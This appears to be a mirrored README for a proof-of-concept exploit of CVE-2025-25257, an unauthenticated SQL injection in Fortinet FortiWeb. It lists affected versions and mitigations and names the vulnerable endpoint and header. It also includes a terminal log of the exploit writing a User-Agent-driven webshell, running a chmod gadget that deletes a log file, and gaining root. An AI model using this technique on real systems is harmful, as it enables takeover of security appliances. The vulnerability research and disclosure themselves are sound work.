CVE-2025-25257 PoC — Fortinet FortiWeb SQL注入漏洞

Source

Associated Vulnerability

Description

CVE-2025-25257

Readme

# CVE-2025-25257 — FortiWeb Critical SQL Injection Vulnerability 🔥

<img width="665" height="375" alt="bug-removebg-preview" src="https://github.com/user-attachments/assets/57839369-cdde-4166-ba13-cf5a9ff978ad" />

### 🧠 Overview:

* **Vulnerability Type**: Unauthenticated **SQL Injection**
* **Component Affected**: FortiWeb GUI / Fabric Connector API
* **CVSS Score**: **9.6 – 9.8 (Critical)**
* **CWE**: CWE-89 – Improper Neutralization of Special Elements in SQL Commands
* **Discovered & Patched**: July 2025
* **Exploitation Status**: Proof-of-concept publicly available; exploitation expected

---

### 🛠 Affected Versions:

| FortiWeb Version | Affected Range  | Fixed Version   |
| ---------------- | --------------- | --------------- |
| 7.6              | 7.6.0 to 7.6.3  | 7.6.4 or later  |
| 7.4              | 7.4.0 to 7.4.7  | 7.4.8 or later  |
| 7.2              | 7.2.0 to 7.2.10 | 7.2.11 or later |
| 7.0              | 7.0.0 to 7.0.10 | 7.0.11 or later |

---

### 🚨 Technical Details:

* The vulnerability allows attackers to **inject SQL** into HTTP/S requests without any login.
* One of the vulnerable endpoints is `/api/fabric/device/status`, where SQL payloads in the `Authorization: Bearer` header can be executed.
* Potential impact includes **full database compromise**, **data theft**, or **remote code execution** via `SELECT … INTO OUTFILE` or similar techniques.

---

### 🔐 Risk:

* **Attack Vector**: Remote, no authentication required
* **Impact**: Full access to FortiWeb backend DB, possible system compromise
* **Threat Level**: **Critical** — especially since FortiWeb is a security appliance

---

### 🧩 Mitigation Steps:

1. **Patch immediately** to the fixed version corresponding to your FortiWeb release.
2. **Restrict or disable HTTP/HTTPS access** to the management interface temporarily.
3. **Monitor logs** for suspicious API calls or Bearer token injections.
4. **Audit internet-facing FortiWeb appliances** and isolate if unpatched.

---

### ✅ TL;DR:

* CVE-2025-25257 is a **critical unauthenticated SQL injection** in FortiWeb.
* Patch now to versions: **7.6.4+, 7.4.8+, 7.2.11+, or 7.0.11+**.
* If unpatched, disable external access to the management GUI.
* Exploitation is likely—treat this as a top priority.

---

### 💀 Exploit:

<img width="1920" height="958" alt="bug1" src="https://github.com/user-attachments/assets/fb8db3c1-e26f-46d4-a247-f7a44f7d332e" />


```
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-25257.py -t https://10.10.10.10:9443/
[*] writing part #!/bin/sh -- 
p
[*] writing part rintf "Content-T
[*] writing part ype: text/html\r
[*] writing part \n";printf "\r\n
[*] writing part ";eval $HTTP_USE
[*] writing part R_AGENT
[>] writing webshell file
[*] writing part import os # 
os
[*] writing part .system('chmod +
[*] writing part x /migadmin/cgi-
[*] writing part bin/x.cgi && rm 
[*] writing part -f /var/log/lib/
[*] writing part python3.10/pylab
[*] writing part .py') #
[>] cooking chmod gadget
[*] triggering chmod
[*] executing `id` ...
uid=0(root) gid=0 groups=0

[*] webshell available at: 
   > https://10.10.10.10:9443/cgi-bin/x.cgi
provide command via the `User-Agent` header!)
```

---


### ⚠️ Disclaimer:

This information is provided for **educational and defensive security purposes only**. Any actions taken using this knowledge must comply with **all applicable laws and ethical standards**. Unauthorized exploitation of systems without explicit permission is **illegal and unethical**. The author assumes **no responsibility** for any misuse or damage resulting from the use of this content.

File Snapshot

 [4.0K]  /data/pocs/0a52edf415200ce3a880fe47b80c2114eb06651e
├── [4.4K]  CVE-2025-25257.py
└── [3.6K]  README.md

0 directories, 2 files

Remarks